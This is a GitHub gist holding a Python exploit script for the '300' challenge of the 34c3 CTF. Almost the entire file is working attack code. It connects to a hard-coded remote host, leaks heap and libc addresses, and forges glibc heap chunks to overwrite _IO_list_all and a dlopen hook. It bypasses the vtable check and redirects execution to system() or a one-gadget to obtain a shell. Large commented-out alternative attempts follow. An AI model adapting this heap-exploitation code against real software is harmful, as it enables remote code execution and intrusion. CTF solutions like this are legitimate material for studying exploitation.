Created
January 3, 2018 17:29
-
-
Save mak/6beb7733344881e96eac7ec8c4b6bc70 to your computer and use it in GitHub Desktop.
Exploit for 300 at 34c3ctf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import phun | |
class R(phun.Remote): | |
def menu(self): | |
self.read('4) free\n') | |
def cmd(self,nr,idx): | |
self.menu() | |
self.sendline(str(nr)) | |
self.sendlineafter('(0-9)\n',str(idx)) | |
def read_it(self,idx): | |
self.cmd(3,idx) | |
return self.readline()[:-1] | |
def alloc(self,idx): | |
self.cmd(1,idx) | |
def free(self,idx): | |
self.cmd(4,idx) | |
def write_it(self,idx,what): | |
self.cmd(2,idx) | |
self.write(what.ljust(0x300,"\x00")) | |
#r= R('192.168.122.234',1234) | |
r= R('104.199.25.43',1337) | |
#r= R('localhost',1234) | |
for i in range(10): | |
r.alloc(i) | |
for i in range(1,7,2): | |
r.free(i) | |
heap = phun.u64(r.read_it(5)) - 0x930 | |
addr_in_libc = phun.u64(r.read_it(1)) | |
main_arena = addr_in_libc - 88 | |
#off1 = 0x3C4B20 | |
off1 = 0x3C1B00 | |
libc = main_arena - off1 # | |
addr = heap + 0x30 | |
free_hook = libc + 0x3C67A8 #0x3C3788 | |
print hex(heap),hex(libc) | |
print hex(main_arena),hex(free_hook) | |
off1 = 0x3C67F8 | |
#off1 = 0x3C37D0 | |
globalmaxfast= libc + off1 - 16 ## | |
off1 = 0x3C4150 | |
#off1 = 0x3C1150 | |
check_action = libc + off1 - 16 ## | |
r.write_it(1,phun.p64(0xdeadbeef,addr)) | |
r.alloc(9) | |
chunk0 = phun.p64(0,0x3f0,addr+0x20,addr+0x20) | |
chunk1 = phun.p64(0,0x310,addr+0x40,addr+0x40) | |
chunk2 = phun.p64(0,0x20,main_arena+88,main_arena+88) | |
r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2) | |
r.alloc(9) | |
r.write_it(1,"\x00"*0x100 + phun.p64(0x3f0)) | |
r.alloc(8) | |
r.alloc(2) | |
r.free(7) | |
r.write_it(7,phun.p64(0xdeadbeef,addr)) | |
r.alloc(3) | |
#raw_input('e') | |
chunk0 = phun.p64(0,0x319,addr+0x20,addr) | |
r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2) | |
r.alloc(4) | |
chunk0 = phun.p64(0,0x311,addr,main_arena+96) | |
r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2) | |
r.alloc(5) | |
chunk2 = phun.p64(0,0x20,main_arena+96,main_arena+96) | |
r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2) | |
r.alloc(1) | |
file_all = libc + 0x3c2500 -0x18#0x3C2500 -0x18# - 0x18 | |
chunk0 = phun.p64(0,0x311,file_all,file_all) | |
r.write_it(1,phun.p64(addr).ljust(0x2f0,"\x00")+\ | |
phun.p64(main_arena+864,main_arena+872)) | |
chunk0 = phun.p64(0,0x310,file_all,file_all) | |
chunk2 = phun.p64(0,0x310,file_all,main_arena+864) | |
r.write_it(0,chunk0+chunk1+chunk2) | |
r.write_it(9,"\x00"*0x10 + chunk2) | |
r.alloc(3) | |
#raw_input('x') | |
chunk0 = phun.p64(0,0x300,addr+0x20,addr+0x20) | |
chunk1 = phun.p64(0,0x310,addr+0x40,addr+0x40) | |
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2) | |
# r.write_it(1,phun.p64(addr).ljust(0x2e0,"\x00")+\ | |
# phun.p64(file_all,file_all)) | |
# r.alloc(3) | |
#bypass vtable check | |
raw_input('x') | |
dlopen_hook = libc + 0x3c62e0 - 0x18 | |
print hex(dlopen_hook) | |
r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2) | |
r.write_it(1,phun.p64(addr).ljust(0x2e0,"\x00")+\ | |
phun.p64(dlopen_hook,dlopen_hook)) | |
r.alloc(3) | |
p = phun.p64(libc + 0xF1651).ljust(0x18,"\x00") | |
#"/bin/bash" | |
# p += phun.p64(1,2) | |
# p = p.ljust(0xa0,"\x00") | |
# p += phun.p64(heap+0x30) | |
# p = p.ljust(0xc0,"\x00") | |
# p += phun.p64(1) | |
# p = p.ljust(0xd8) | |
# p += phun.p64(heap + 0x10) | |
system = libc + 0x456A0 #0x45390 | |
jump_table = "\x00"* 0x18 + phun.p64(system) | |
raw_input('x') | |
r.write_it(0,jump_table + p) | |
r.free(7) | |
''' | |
arena+856 - my small bin | |
victim: | |
- | |
''' | |
#r.write_it(7,phun.p64(0xdeadbeef,main_arena+88)) | |
# chunk0 = phun.p64(0,0x311,main_arena+88,main_arena+88) | |
# chunk2 = phun.p64(0,0x3f0,main_arena+88,main_arena+88) | |
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2) | |
# r.write_it(1,"\x00"*(0x100-0xf0+0x10) + phun.p64(0x311,0x20,1,1,1,1,1)) | |
# r.alloc(8) | |
# r.free(8) | |
# r.write_it(9,phun.p64(0xdeadbeef1,free_hook-0x20)) | |
# r.alloc(4) | |
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2) | |
# r.write_it(1,"\x00"*(0x100-0xf0+0x10) + phun.p64(0x311,0x21,1,1,1,1,1)) | |
# r.free(8) | |
# chunk0 = phun.p64(0,0x319,main_arena+88,addr+0x20) | |
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2) | |
# r.write_it(1,"\x00"*(0x100-0xf0+0x18) + phun.p64(0x319,0x21,1,1,1,1,1)) | |
# r.write_it(9,phun.p64(0xdeadbeef2,check_action)) | |
# r.alloc(4) | |
# chunk0 = phun.p64(0,0x3f1,main_arena+88,main_arena+88) | |
# chunk2 = phun.p64(0,0x3f1,main_arena+88,main_arena+88) | |
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2) | |
# r.write_it(1,"\x00"*(0x100) + phun.p64(0x3f1,0x21,1,1,1,1,1)) | |
# r.free(8) | |
# chunk0 = phun.p64(0,0x3f1,main_arena+88,addr+0x20) | |
# r.write_it(0,"\x00"*0x20+chunk0+chunk1+chunk2) | |
# r.write_it(9,phun.p64(addr,free_hook-0x20+8)) | |
# r.alloc(4) | |
# chunk0 = phun.p64(0,0x3f1,main_arena+88,main_arena+88) | |
# chunk1 = phun.p64(0,0x91,main_arena+88,main_arena+88) | |
# x= "\x00"*0x20+chunk0+chunk1+chunk2 | |
# x+="\x00"*0x50 + phun.p64(0,0x21,0,0,1,1,1,1,1) | |
# r.write_it(0,x) | |
# raw_input('x') | |
# r.free(9) | |
# # r.write_it(5,phun.p64(0xdeadbeef,check_action)) | |
# # for i in range(3): | |
# # r.alloc(1) | |
# # r.free(1);r.free(3);r.free(7) | |
# # for i in range(9): | |
# # r.alloc(i) | |
# # for i in range(1,7,2): | |
# # r.free(i) | |
# # r.write_it(5,phun.p64(0xdeadbeef,globalmaxfast)) | |
# # r.alloc(1);r.alloc(2);r.alloc(3) | |
# # # r.free(1) | |
# # # r.free(2) | |
# # # r.free(3) | |
# # r.free(5) | |
# # #r.write_it(5,phun.p64(free_hook,free_hook)) | |
# # r.alloc(0) | |
# # for i in range(10): | |
# # r.alloc(i) | |
# # raw_input('x') | |
# # #r.alloc(3) | |
# # # # #r.write_it( | |
r.shell() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment